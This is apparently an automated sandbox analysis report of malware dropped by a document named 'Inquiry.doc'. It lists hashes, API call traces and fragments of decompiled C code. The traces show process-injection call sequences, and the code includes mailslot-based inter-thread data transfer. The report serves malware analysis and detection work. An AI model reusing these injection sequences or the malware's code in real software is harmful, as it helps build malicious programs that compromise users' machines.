  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

Process Name: crypmgmt.exe Analysis ID: 63270

General

Root Process Name:d3d8sext.exe
Process MD5:3067FCCA87759E8F70DE41B4B5C179D9
Total matches:141
Initial Analysis Report:Open
Initial sample Analysis ID:63270
Initial sample SHA 256:FFB9190514D3491BC79F13EF817E2D34E10E9A04ADF62ACE135FBED3EAFC4CE1
Initial sample name:Inquiry.doc

Similar Executed Functions

Function 001CDA13, Relevance: 10.6, APIs: 7, Instructions: 111 Total matches: 36string
Similarity
  • Total matches: 36
  • API ID: CreateEventGetLastErrorRtlAddVectoredExceptionHandlerRtlRemoveVectoredExceptionHandlerStrRChr_struprlstrlen
  • String ID:
  • API String ID: 1244505096-0
  • Opcode ID: e7bdade24c4945e58ca902ffe0c9ca2f3df43dc30c200f231c9832c7f3637fe3
  • Instruction ID: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
  • Opcode Fuzzy Hash: 0AF099380984018E452FA8A8581471E4B0CB4827DB68C7F17FDE81006E5F4FF0E05FA9
  • Instruction Fuzzy Hash: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
APIs
  • StrRChrA.SHLWAPI(001EB090,00000000,0000005C), ref: 001CDA47
  • _strupr.NTDLL ref: 001CDA5D
  • lstrlen.KERNEL32(001EB090,?,001EC638), ref: 001CDA65
    • Part of subcall function 001D99D2: NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
    • Part of subcall function 001D99D2: NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
    • Part of subcall function 001D99D2: memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001D99D2: NtClose.NTDLL(001EC638), ref: 001D9A84
    • Part of subcall function 001D99D2: NtClose.NTDLL(?), ref: 001D9A8E
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,001EC638), ref: 001CDAE5
  • RtlAddVectoredExceptionHandler.NTDLL(00000000,001CD036), ref: 001CDB0C
    • Part of subcall function 001CD519: memset.NTDLL ref: 001CD561
    • Part of subcall function 001CD519: CreateMutexA.KERNEL32(00000000,00000001,00000000,0000005C,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD59C
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD5A7
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(001EB020), ref: 001CD5BF
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CD617
    • Part of subcall function 001CD519: NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 001CD65C
    • Part of subcall function 001CD519: OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD671
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD67B
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(00000000), ref: 001CD689
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000018), ref: 001CD716
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD79E
    • Part of subcall function 001CD519: LoadLibraryA.KERNEL32(001EC000), ref: 001CD7A9
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000071), ref: 001CD821
    • Part of subcall function 001CD519: wsprintfA.USER32 ref: 001CD849
  • GetLastError.KERNEL32(?,?,?,001EC638), ref: 001CDB26
  • RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CDB3C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D99D2, Relevance: 10.6, APIs: 7, Instructions: 81 Total matches: 84native
Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: 14313892d018c28c1512d211c24bd9508d3a727c070e1f2f8c81eb1ee10ca15e
  • Instruction ID: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
  • Opcode Fuzzy Hash: 65E061A35807C6FB51DA20701C03DE6D691FE10790C4C5B26D4F82D1864E5574794B07
  • Instruction Fuzzy Hash: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
APIs
  • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
  • NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
  • memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • NtClose.NTDLL(001EC638), ref: 001D9A84
  • NtClose.NTDLL(?), ref: 001D9A8E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B3278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: f060986f037786d6eff44f917c1f9cd1492eae5187663b5233982b63c154d879
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: A6E0C00114CEC4E7E9F2B8060843B2BA0507FC0942E5D7BA173A88952F1F20B012070A
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 01B327EA
  • memset.NTDLL ref: 01B3280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B3282B
  • NtClose.NTDLL(?), ref: 01B3283F
    • Part of subcall function 01B32750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01B3277D
    • Part of subcall function 01B32750: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B32784
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001F1040, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 226 Total matches: 134native
Similarity
  • Total matches: 134
  • API ID: NtProtectVirtualMemory
  • String ID: z
  • API String ID: 1546459799-1657960367
  • Opcode ID: cf60b7cb83ce32be4ff946b1fad70a6d95e18f7d6e657a237c07f6ddb8ba3109
  • Instruction ID: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
  • Opcode Fuzzy Hash: C321CD43048F92C7E9BB64801117F962385FBA3C6AD88FB625EA0576571F0036079FAB
  • Instruction Fuzzy Hash: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
APIs
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F11E1
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F124B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665752385.001F1000.00000040.sdmp, Offset: 001F1000, based on PE: false
Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95threadsynchronization
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}













0x00401647
0x0040164f
0x00401664
0x0040166e
0x00401672
0x00401675
0x00401713
0x0040167b
0x0040168c
0x0040168e
0x00401692
0x00401695
0x004016fe
0x00401697
0x004016a0
0x004016a3
0x004016b4
0x004016e7
0x004016bb
0x004016c0
0x004016cd
0x004016d7
0x004016dc
0x004016dc
0x004016cd
0x004016f0
0x004016f0
0x00401704
0x0040170a
0x0040171c

APIs
  • CreateThread.KERNEL32(00000000,00000000,Function_00001034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,Function_000010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 004015B9
  • TerminateThread.KERNEL32(?,?), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32 ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32 ref: 0040170D
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95sleepfile
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 60d4fe491098cd8b8ea8b2edc024baa0d2d95a9826389b7bc5e65ecf9349917b
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: D8F02E85425EC28BC77E20442911BA16086B782F42C6CC3B29ED23829B4F41710B0B46
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

















0x004010fb
0x004010fb
0x00401104
0x00401107
0x00401118
0x00401121
0x00401124
0x00401139
0x00401126
0x0040112e
0x00401131
0x00401131
0x0040113c
0x00401145
0x004011ea
0x004011ef
0x004011ef
0x00401158
0x0040115f
0x004011da
0x004011e1
0x004011e4
0x00000000
0x004011e4
0x00401161
0x00401164
0x00401165
0x00401168
0x0040116e
0x00401170
0x00401173
0x00401175
0x00401175
0x0040118a
0x00401192
0x004011a8
0x004011b1
0x004011b4
0x00000000
0x00000000
0x00401194
0x00401194
0x00401197
0x0040119a
0x0040119c
0x004011a2
0x004011a3
0x004011a3
0x0040119c
0x004011b8
0x004011be
0x004011c8
0x004011d1
0x00000000

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00000000,004017B9), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 01B31093, Relevance: 10.6, APIs: 7, Instructions: 67 Total matches: 199memorythread
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: a72f6809e5b1c4c7d5409b103898ea3008340710279a26a1989ceb7ae5150f24
  • Instruction ID: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
  • Opcode Fuzzy Hash: F6E02B8C1B8C09C3C66C0C8B15B4B121153CFE2F119FCD38932A06A41DA356BC346F8C
  • Instruction Fuzzy Hash: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
APIs
  • InterlockedIncrement.KERNEL32(01B37448), ref: 01B310B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 01B310C5
    • Part of subcall function 01B31000: memcpy.NTDLL(01B37570,?,0000000C,01B36248,0000000C,01B310E9,?,00000000,?), ref: 01B31038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 01B310F1
  • InterlockedDecrement.KERNEL32(01B37448), ref: 01B31109
  • SleepEx.KERNEL32(00000064,00000001), ref: 01B31125
  • CloseHandle.KERNEL32 ref: 01B31141
  • HeapDestroy.KERNEL32 ref: 01B3114E
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64 Total matches: 190memorysleepfile
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a541a8e2a336522e40d1be30749048c9d818c078e896fa602c1e5c17c186f932
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 7FE026810629C5C686BB500A28013B370CBBB7178BD9EE7700AA7390831FC23017564A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}















0x00401033
0x0040103d
0x0040104c
0x0040104f
0x00401057
0x0040105a
0x004010d6
0x004010dc
0x004010df
0x0040105c
0x00401062
0x00401066
0x004010c4
0x004010c4
0x00401068
0x00401068
0x00401076
0x0040107e
0x004010a4
0x004010ad
0x004010b0
0x004010b2
0x00000000
0x004010b2
0x00401080
0x00401080
0x00401086
0x00401092
0x00401098
0x0040109c
0x00000000
0x0040109e
0x0040109e
0x00000000
0x0040109e
0x0040109c
0x00000000
0x004010b5
0x004010b7
0x004010bd
0x004010c2
0x004010cb
0x004010ce
0x004010ce
0x004010e6
0x004010e8
0x004010eb
0x004010ee
0x004010ee
0x004010f8

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,?,00401062,00001000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 01B31673, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 194file
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 9e01726764579839827e9094e6fbaf3217b41c7c4a8b193b143c1758af8567f1
  • Instruction ID: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
  • Opcode Fuzzy Hash: 43D0C2690F8C3ED0810A040688F172332011FA0B4E63CD81537A134011E7F07789CB0C
  • Instruction Fuzzy Hash: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
APIs
  • CreateFileW.KERNEL32(01B374BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 01B31689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B3169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B316B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,01B37494), ref: 01B316C9
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316D7
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316E4
  • GetLastError.KERNEL32(?,01B37494), ref: 01B316F3
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B322D2, Relevance: 9.1, APIs: 6, Instructions: 105 Total matches: 307threadsynchronizationinjection
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: 9df6b1f1380250b2af8b1cb859a0ad26280c930233838fa98c0b82c5bdb989db
  • Instruction ID: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
  • Opcode Fuzzy Hash: 3B01FE0E036F83C2ED6626011251FA1A381BF43A70E8EA726B371213DE5F54B50D870D
  • Instruction Fuzzy Hash: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
APIs
  • memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B332C5: GetModuleHandleA.KERNEL32(01B3811F,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B332DF
    • Part of subcall function 01B332C5: GetProcAddress.KERNEL32(00000000,01B3865C,?,?,01B31790,00000000,?,01B37494), ref: 01B332F0
    • Part of subcall function 01B332C5: OpenProcess.KERNEL32(00000400,00000000,01B37494,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3330D
    • Part of subcall function 01B332C5: IsWow64Process.KERNELBASE(01B374A4,?,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3331E
    • Part of subcall function 01B332C5: CloseHandle.KERNEL32(01B374A4), ref: 01B33331
    • Part of subcall function 01B33DE6: NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
    • Part of subcall function 01B33DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
    • Part of subcall function 01B33DE6: SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
  • ResumeThread.KERNELBASE(?), ref: 01B32418
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000,01B324C1), ref: 01B31A4D
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1), ref: 01B31A81
  • ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
  • WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
  • SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
    • Part of subcall function 01B32175: memset.NTDLL ref: 01B321A3
    • Part of subcall function 01B32175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 01B3222D
    • Part of subcall function 01B32175: WaitForSingleObject.KERNEL32(00000064), ref: 01B3223B
    • Part of subcall function 01B32175: SuspendThread.KERNEL32(?), ref: 01B3224E
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31DE0
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31E2F
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,01B324F9,00000800,?,?,?,00000000), ref: 01B31E9F
    • Part of subcall function 01B31CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 01B31ECA
    • Part of subcall function 01B31CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B31ED1
    • Part of subcall function 01B31CB2: CloseHandle.KERNEL32(00000000), ref: 01B31EE0
    • Part of subcall function 01B31CB2: memset.NTDLL ref: 01B31EF4
  • GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001D77D8, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 97memory
Similarity
  • Total matches: 97
  • API ID: VirtualProtect$GetLastErrorRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2510858262-0
  • Opcode ID: 79e378e90741fe03a1868ff575f465e1dcc9b1d4b7d085768b56240e49bf8d92
  • Instruction ID: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
  • Opcode Fuzzy Hash: B2019C28149E95B7D43BB0841C52EC1C254BB53294C1D6372E892241C73F007709BB19
  • Instruction Fuzzy Hash: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
APIs
    • Part of subcall function 001D75AC: GetLastError.KERNEL32(00000024,?,001D7807,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?,?,00000000,001E5050,00000000), ref: 001D75D9
    • Part of subcall function 001D9FF2: lstrcmpi.KERNEL32(?,00000000), ref: 001DA027
  • VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,00000000,?,00000000,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?), ref: 001D7865
  • VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,001CB2EF), ref: 001D789F
  • RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D78E5
    • Part of subcall function 001D7646: lstrlen.KERNEL32(00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7678
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7692
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D76C5
  • RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D78C7
  • GetLastError.KERNEL32(?,001CB2EF), ref: 001D78FA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DA098: lstrcmpi.KERNEL32(?,00000000), ref: 001DA0DC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D8325, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 223libraryloader
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 334b4ad23c3ebcab69ace51bbaeeff1e78eacdd0a0d3c55371ac3bd1638c0514
  • Instruction ID: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
  • Opcode Fuzzy Hash: 4CD05EF84B9C968B402B7450581D36CA586B9D12C5ACC3663F326A685EAB11B3D0477A
  • Instruction Fuzzy Hash: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
APIs
  • GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
  • GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
